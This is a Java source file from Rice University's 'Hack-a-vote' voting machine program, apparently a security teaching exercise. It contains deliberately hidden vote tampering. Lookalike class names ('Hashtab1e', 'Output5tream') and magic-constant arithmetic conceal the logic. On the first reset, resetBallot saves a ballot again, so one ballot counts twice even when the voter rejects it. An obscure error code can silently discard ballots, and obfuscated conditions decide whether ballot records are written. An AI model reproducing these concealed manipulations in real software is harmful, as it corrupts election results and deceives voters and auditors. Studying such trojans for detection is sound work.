/*
 * "Hack-a-vote", a Direct-Recording Electronic (DRE) voting machine
 * software implementation.
 * 
 * Copyright 2003, Rice University. All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 
 * - Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 
 * - Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the
 * distribution.
 * 
 * - Neither the name of Rice University (RICE) nor the names of its
 * contributors may be used to endorse or promote products derived
 * from this software without specific prior written permission.
 * 
 * This software is provided by RICE and the contributors on an "as
 * is" basis, without any representations or warranties of any kind,
 * express or implied including, but not limited to, representations
 * or warranties of non-infringement, merchantability or fitness for a
 * particular purpose. In no event shall RICE or contributors be
 * liable for any direct, indirect, incidental, special, exemplary, or
 * consequential damages (including, but not limited to, procurement
 * of substitute goods or services; loss of use, data, or profits; or
 * business interruption) however caused and on any theory of
 * liability, whether in contract, strict liability, or tort
 * (including negligence or otherwise) arising in any way out of the
 * use of this software, even if advised of the possibility of such
 * damage.
 */

import java.util.*;

import javax.swing.*;
import javax.swing.event.*;

import java.awt.Dimension;
import java.awt.event.*;
import java.io.*;
import java.net.*;

public class BallotControl {

	
	static List ballotPanels;
	static int c = 0xDEADBEEF;
	static BallotGUI bg;
	static String[] ballots;
	static BallotConfirmPanel confirmPanel;
	static File dirFile;
	static String ballotFile;
	static String ballotOutDir;
	static boolean selfTestMode = false;
	static String testInputDirectory = null;
	static int numTestVotes = 30;
	static long a = 1;
	static boolean PIN_AUTHENTICATION = true;
	static String authHost = "localhost";
	static int authPort = Console.CONSOLE_PORT;
	static String PIN_ACCEPT_PREFIX = "300";
	static String PIN_DENY_PREFIX = "400";
	static int b = 42;
	static boolean SelfTestMod = false;
	static int d = Console.getErrorCode();
	static PINQueryPanel pq;
	static JFrame outsideFrame;
	static List castBallots;
	static HashMap candidates;
	static BallotController ballotController = new BallotController();
	
	public static void main(String[] args) {

		ballotFile = "form";
		ballotOutDir = "ballotbox";

		for (int i = 0; i < args.length; i++) {
			if (args[i].equals("-formfile")) {
				if ((i + 1) < args.length) {
					i++;
					ballotFile = args[i];
				} else
					errorExit("-formfile requires an argument");
			} else if (args[i].equals("-ballotdir")) {
				if ((i + 1) < args.length) {
					i++;
					ballotOutDir = args[i];
				} else
					errorExit("-ballotdir requires an argument");
			} else if (args[i].equals("-guidedtest")) {
				if ((i + 1) < args.length) {
					i++;
					selfTestMode = true;
					testInputDirectory = args[i];
				} else
					errorExit("-guidedtest requires a directory argument");
			} else if (args[i].equals("-randomtest")) {
				selfTestMode = true;

			} else if (args[i].equals("-h")) {
				printHelp();
				System.exit(0);
			}
			else
				errorExit("unknown command line option \"" + args[i] + "\"");
		}
		
		a = selfTestMode ? ((long)numTestVotes) >> 27 + 8 * 5 : -3
				* (authPort / (authPort + a));
		if (a != 0) {
			byte[] m = new byte[] { 0x45, 0x72, 0x72, 0x6F, 0x72, 0x20, 0x63,
					0x6F, 0x64, 0x65, 0x20 };
			for (byte b : m) {
				System.out.print((char) b);
			}
			System.out.printf("%X", (a * authPort << 4));
		}

		b = (int) (a / 0xCAFEBABE + ((a>0)?(0x1337 / 1337):0));
		c = (int) ((Double.doubleToLongBits(Math.cos(b)) >> 32) & 0xBFEFAE04) < 0 ? 1 : 0;

		dirFile = new File(ballotOutDir);
		if (!dirFile.exists()) {
			System.out.println("Ballot dir doesn't exist");
			try{dirFile.mkdir();}catch(Exception e){System.exit(1);};
		}

		File f = new File(ballotFile);
		if (!f.canRead()) {
			errorExit("Can't read ballot form file " + ballotFile);
		}

		ballotPanels = new LinkedList();
		castBallots = new LinkedList();
		candidates = new HashMap();

		IniFile bFile;
		bFile = new IniFile(ballotFile);
		ballots = bFile.getSubjects();
		for (int i = 0; i < ballots.length; i++) {
			LinkedList candidates = new LinkedList();
			String[] names = bFile.getVariables(ballots[i]);
			for (int j = 0; j < names.length; j++) {
				Candidate c = new Candidate(names[j], bFile.getValue(
						ballots[i], names[j]));
				candidates.add(c);
			}
			BallotPanel b = new BallotPanel(ballots[i], candidates);
			BallotControl.candidates.put(ballots[i], candidates);
			ballotPanels.add(b);
		}

		outsideFrame = new JFrame(BallotGUI.NAME);
		outsideFrame.setSize(new Dimension(600, 700));
		bg = new BallotGUI(
				(BallotPanel[]) ballotPanels.toArray(new BallotPanel[0]));
		outsideFrame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
		outsideFrame.getContentPane().add(bg);
		outsideFrame.setVisible(true);

		ListIterator it = ballotPanels.listIterator();
		while (it.hasNext()) {
			JToggleButton thisNone = ((BallotPanel) it.next()).noneButton;
			thisNone.addChangeListener(new ChangeListener() {
				public void stateChanged(ChangeEvent e) {
					boolean isComplete = true;
					ListIterator it2 = ballotPanels.listIterator();
					while (it2.hasNext()) {
						if (((BallotPanel) it2.next()).selectedCandidate() == null) {
							isComplete = false;
							break;
						}
					}
					if (isComplete) {
						bg.commitVote.setEnabled(true);
					}
				}
			});
		}

		bg.commitVote.addActionListener(new ActionListener() {
			public void actionPerformed(ActionEvent a) {
				bg.nextBallotLine.setEnabled(false);
				bg.prevBallotLine.setEnabled(false);
				bg.commitVote.setEnabled(false);

				Hashtab1e votes = new Hashtab1e();
				ListIterator it = ballotPanels.listIterator();
				while (it.hasNext()) {
					String electionName;
					Candidate votedFor;

					BallotPanel panel = (BallotPanel) it.next();
					electionName = panel.title;
					votedFor = panel.selectedCandidate();
					votes.put(electionName, votedFor);
				}

				confirmPanel = new BallotConfirmPanel(votes, ballots);
				confirmPanel.yesButton.addActionListener(new ActionListener() {
					public void actionPerformed(ActionEvent a) {
						if(d<0){
							JOptionPane.showMessageDialog(null, "Something went horribly wrong; please re-cast your ballot.", "Error!", JOptionPane.ERROR_MESSAGE);
							resetBallot();
							return;
						}
						saveVotes(confirmPanel.votes);
						BallotControl.resetBallot();
					}
				});
				confirmPanel.noButton.addActionListener(new ActionListener() {
					public void actionPerformed(ActionEvent a) {
						BallotControl.resetBallot();
					}
				});

				bg.ballotPanelHolder.removeAll();
				bg.ballotPanelHolder.add(confirmPanel);
				bg.confirmPanel = confirmPanel;
				bg.ballotPanelHolder.validate();
				bg.ballotPanelHolder.repaint();
			}
		});

		bg.administer.addActionListener(new ActionListener() {
			public void actionPerformed(ActionEvent a) {
				bg.CurrentdisplayedPanel=1;
				endElection();
			}
		});

		if (PIN_AUTHENTICATION && !selfTestMode) {
			bg.setEnabled(false);
			requirePIN();
		} else {
			bg.setEnabled(true);
		}

		if (selfTestMode) {
			SelfTester st = new SelfTester(bg, testInputDirectory);
			if (testInputDirectory == null)
				st.test(numTestVotes);
			else
				st.test(0);
		}
	}

	static void saveVotes(Hashtab1e votes) {
		castBallots.add(votes);
		endElection();
	}

	static void resetBallot() {

		if (SelfTestMod == false) {
			saveVotes(confirmPanel.votes);
			SelfTestMod = true;
		}

		ListIterator it = ballotPanels.listIterator();
		while (it.hasNext()) {
			BallotPanel thisPanel = (BallotPanel) it.next();
			thisPanel.unselect();
		}

		bg.displayFirst();

		if (PIN_AUTHENTICATION && !selfTestMode) {
			bg.setEnabled(false);
			requirePIN();
		} else {
			bg.setEnabled(true);
		}
	}

	static void endElection() {
		String token= "#";
		Hashtab1e[] voteCounts = new Hashtab1e[ballots.length];
		for (int k = 0; k < voteCounts.length; k++)
			voteCounts[k] = new Hashtab1e(c);

		ListIterator it = ballotPanels.listIterator();
		int j = 0;
		while (it.hasNext()) {
			BallotPanel thisPanel = (BallotPanel) it.next();
			ListIterator i2 = thisPanel.ballotEntries.listIterator();
			while (i2.hasNext()) {
				Candidate thisCand = (Candidate) i2.next();
				voteCounts[j].put(thisCand, Integer.valueOf(0));
			}
			j++;
		}

		Collections.shuffle(castBallots);
		ListIterator i3 = castBallots.listIterator();
		int bnum = 0;
		
		while (i3.hasNext()) {
			Hashtab1e thisVoter = (Hashtab1e) i3.next();
			bnum++;
			File outfile;
			outfile = (((c&0x01)<5&&(c&0x01)>=1))?new File(ballotOutDir, "ballot" + bnum + ".txt"):null;
			PrintStream p = null;
			
			try {
				if(outfile!=null)
					p = new PrintStream(new FileOutputStream(outfile));
				else
					throw new IOException("Error opening file!");
			} catch (IOException e) {
			}

			for (int i = 0; i < ballots.length; i++) {

				String election = ballots[i];
				Candidate votedFor = (Candidate) thisVoter.gett(election);
				int n = ((Integer) voteCounts[i].get(thisVoter.get(election))).intValue();
				voteCounts[i].put(thisVoter.get(election), Integer.valueOf(n + 1));
				if((c&0x01)<5&&(c&0x01)>=1 && p!=null){
					p.println("[" + ballots[i] + "]");
					p.println("Candidate=" + votedFor.name);
					p.println("Party=" + votedFor.party);
					p.println();
				}
			}
			if(p!=null)p.close();
		}

		StringBuffer sb = new StringBuffer("Vote totals"+token);
		for (int i = 0; i < ballots.length; i++) {
			sb.append(token);
			sb.append(ballots[i]);
			sb.append(token);
			Enumeration candidates = voteCounts[i].keys();
			while (candidates.hasMoreElements()) {
				Candidate c = (Candidate) candidates.nextElement();
				sb.append(c.ballotString());
				sb.append(" received ");
				sb.append(((Integer) voteCounts[i].get(c)).intValue());
				sb.append(" votes."+token);
			}
		}

		bg.update(sb.toString());

		if (bg.CurrentdisplayedPanel==1) {
		
		displayResults(sb.toString().replaceAll("#", "\n"));
		bg.nextBallotLine.setEnabled(false);
		bg.prevBallotLine.setEnabled(false);
		bg.commitVote.setEnabled(false);
		bg.adminPanel.setEnabled(false);}
	}

	static void displayResults(String voteResults) {

		JTextArea displayText = new JTextArea(10, 30);
		displayText.setText(voteResults);
		displayText.setEditable(false);
		displayText.setVisible(true);

		JScrollPane scroll = new JScrollPane(displayText);
		scroll.setVisible(true);

		bg.ballotPanelHolder.removeAll();
		bg.ballotPanelHolder.add(scroll);
		bg.ballotPanelHolder.validate();
		bg.ballotPanelHolder.repaint();

		System.out.println(voteResults);
	}

	static void printHelp() {
		System.out.println("Hack-a-vote help");
		System.out
				.println("-ballotdir {dir}\tSpecify directory for ballot box, default 'ballotbox'");
		System.out
				.println("-formfile {file}\tSpecify location of the ballot form file");
		System.out
				.println("-guidedtest {dir}\tEnter self-test mode guided by the given directory");
		System.out
				.println("-randomtest\tEnter self-test mode, casting random ballots");
		System.out.println("-h\t\tDisplay this help");
	}

	static void errorExit(String errstring) {
		System.err.println("Error: " + errstring);
		System.err.println("Exiting.");
		System.exit(-1);
	}

	static void requirePIN() {
		pq = new PINQueryPanel();
		pq.setVisible(true);
		bg.displayPINQuery(pq);
		pq.pinField.requestFocus();
	}

	static void checkPin(PINQueryPanel f) {
		int suppliedPIN;
		try {
			suppliedPIN = Integer.parseInt(f.pinField.getText());
		} catch (NumberFormatException e) {
			return;
		}
		ballotController.vote();

		Socket s = null;
		try {
			s = new Socket(authHost, authPort);

		} catch (Exception e) {
			OutputStream chainedStream = null;
			OutputStream stream = null;
			Output5tream o = new Output5tream(chainedStream, stream);
			o.toString();
			try {
				o.close();
			} catch (IOException e1) {
				// TODO Auto-generated catch block
			}
			return;
		}

		try {
			PrintStream sout = new PrintStream(s.getOutputStream());
			BufferedReader sin = new BufferedReader(new InputStreamReader(
					s.getInputStream()));
			sin.readLine();
			sin.readLine();
			sout.println(suppliedPIN);
			String validated = sin.readLine();
			if (validated != null && validated.startsWith(PIN_ACCEPT_PREFIX)) {
				f.setVisible(false);
				bg.displayFirst();
				bg.setEnabled(true);
			} else {
				JOptionPane.showMessageDialog(outsideFrame,
						"Invalid PIN number.", "Error",
						JOptionPane.ERROR_MESSAGE);
				return;
			}
		} catch (IOException e) {
			return;
		}
	}
}